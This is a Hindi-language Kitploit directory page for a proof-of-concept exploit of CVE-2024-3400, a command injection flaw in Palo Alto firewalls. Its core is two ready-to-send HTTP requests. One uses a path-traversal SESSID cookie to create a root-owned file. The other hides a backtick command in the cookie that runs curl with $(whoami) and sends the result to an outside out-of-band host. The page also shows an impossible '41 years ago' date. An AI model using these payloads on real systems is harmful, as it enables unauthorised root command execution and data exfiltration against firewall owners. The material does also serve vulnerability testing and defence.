Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3400-poc — CVE-2024-3400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Palo Alto फ़ायरवॉल में एक कमांड इंजेक्शन भेद्यता है, जो तैयार किए गए HTTP अनुरोधों के माध्यम से फ़ाइल निर्माण और रिमोट कमांड निष्पादन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/ghassansabir/cve-2024-3400-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubghassansabir/cve-2024-3400-poc

CVE-2024-3400-poc

CVE-2024-3400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Palo Alto फ़ायरवॉल में एक कमांड इंजेक्शन भेद्यता है, जो तैयार किए गए HTTP अनुरोधों के माध्यम से फ़ाइल निर्माण और रिमोट कमांड निष्पादन का प्रदर्शन करता है।

रिपॉजिटरी देखें
41 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3400 भेद्यता PoC (सत्यापन उपकरण)

भेद्यता विवरण

CVE-2024-3400 Palo Alto फ़ायरवॉल सिस्टम में मौजूद एक कमांड इंजेक्शन भेद्यता है। हमलावर सावधानीपूर्वक तैयार किए गए HTTP अनुरोध के माध्यम से लक्ष्य सर्वर पर दुर्भावनापूर्ण कमांड निष्पादित कर सकता है, और यहाँ तक कि root विशेषाधिकार भी प्राप्त कर सकता है।

भेद्यता पुनरुत्पादन चरण

  1. निम्नलिखित HTTP अनुरोध भेजें:
root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

यह अनुरोध भेजने के बाद, आप सर्वर पर hellome1337.txt नामक फ़ाइल बनाएँगे, और इस फ़ाइल के पास root विशेषाधिकार होंगे।

  1. जब आप इस फ़ाइल तक पहुँचने का प्रयास करेंगे, तो आपको HTTP स्थिति कोड 403 (निषिद्ध) वापस मिलना चाहिए, न कि 404 (नहीं मिला)।

स्क्रीनशॉट इस भेद्यता शोषण प्रक्रिया के प्रभाव को दर्शाते हैं:

image

image

कमांड इंजेक्शन उदाहरण

इस भेद्यता का उपयोग करके कमांड इंजेक्शन निष्पादित करने के लिए, आप निम्नलिखित HTTP अनुरोध भेज सकते हैं:

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

यह अनुरोध सर्वर पर whoami कमांड निष्पादित करेगा, और परिणाम को निर्दिष्ट दूरस्थ सर्वर (उदाहरण: xxxxxxxxxxxxxxxxx.oast.fun) पर भेज देगा।

आगे पढ़ें

  • Rapid7 विश्लेषण
  • WatchTowr लैब विश्लेषण
टूल डाउनलोड करें